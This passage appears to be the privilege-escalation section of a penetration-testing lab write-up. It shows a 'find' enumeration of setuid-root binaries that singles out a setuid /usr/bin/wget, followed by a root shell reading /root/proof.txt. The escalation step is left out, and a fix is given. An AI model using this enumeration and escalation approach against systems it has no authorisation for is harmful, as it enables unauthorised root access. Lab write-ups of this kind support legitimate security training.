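Privilege Escalation

Enumerating setuid-root binaries as clumsyadmin. The entries below are the usual distribution setuid helpers, with one exception: /usr/bin/wget is not normally setuid, and with that bit set it performs its file reads and writes with root's privileges for any local user. The escalation step itself is not shown between the listing and the root shell; presumably it relied on this misconfiguration. The fix is `chmod u-s /usr/bin/wget`, and comparing this `find` output against a known-good baseline on a schedule catches the same kind of drift.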

clumsyadmin@xposedapi:/home/clumsyadmin$ find / -type f -perm -04000 -ls 2>/dev/null
<yadmin$ find / -type f -perm -04000 -ls 2>/dev/null
   273373     52 -rwsr-xr--   1 root     messagebus    51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   276719    428 -rwsr-xr-x   1 root     root         436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
   398815     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   266035     52 -rwsr-xr-x   1 root     root          51280 Jan 10  2019 /usr/bin/mount
   262183     64 -rwsr-xr-x   1 root     root          63736 Jul 27  2018 /usr/bin/passwd
   265710     64 -rwsr-xr-x   1 root     root          63568 Jan 10  2019 /usr/bin/su
   276984    456 -rwsr-xr-x   1 root     root         466496 Apr  5  2019 /usr/bin/wget
   282583     36 -rwsr-xr-x   1 root     root          34896 Apr 22  2020 /usr/bin/fusermount
   266037     36 -rwsr-xr-x   1 root     root          34888 Jan 10  2019 /usr/bin/umount
   262179     56 -rwsr-xr-x   1 root     root          54096 Jul 27  2018 /usr/bin/chfn
   262180     44 -rwsr-xr-x   1 root     root          44528 Jul 27  2018 /usr/bin/chsh
   265563     44 -rwsr-xr-x   1 root     root          44440 Jul 27  2018 /usr/bin/newgrp
   272436    156 -rwsr-xr-x   1 root     root         157192 Jan 20  2021 /usr/bin/sudo
   262182     84 -rwsr-xr-x   1 root     root          84016 Jul 27  2018 /usr/bin/gpasswd
bash-5.0# whoami && cat /root/proof.txt && ip addr
whoami && cat /root/proof.txt && ip addr
root
a2ac32aa193d0d7634ea5742e51ce05c
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:bf:e3:d5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.214.134/24 brd 192.168.214.255 scope global ens192
       valid_lft forever preferred_lft forever
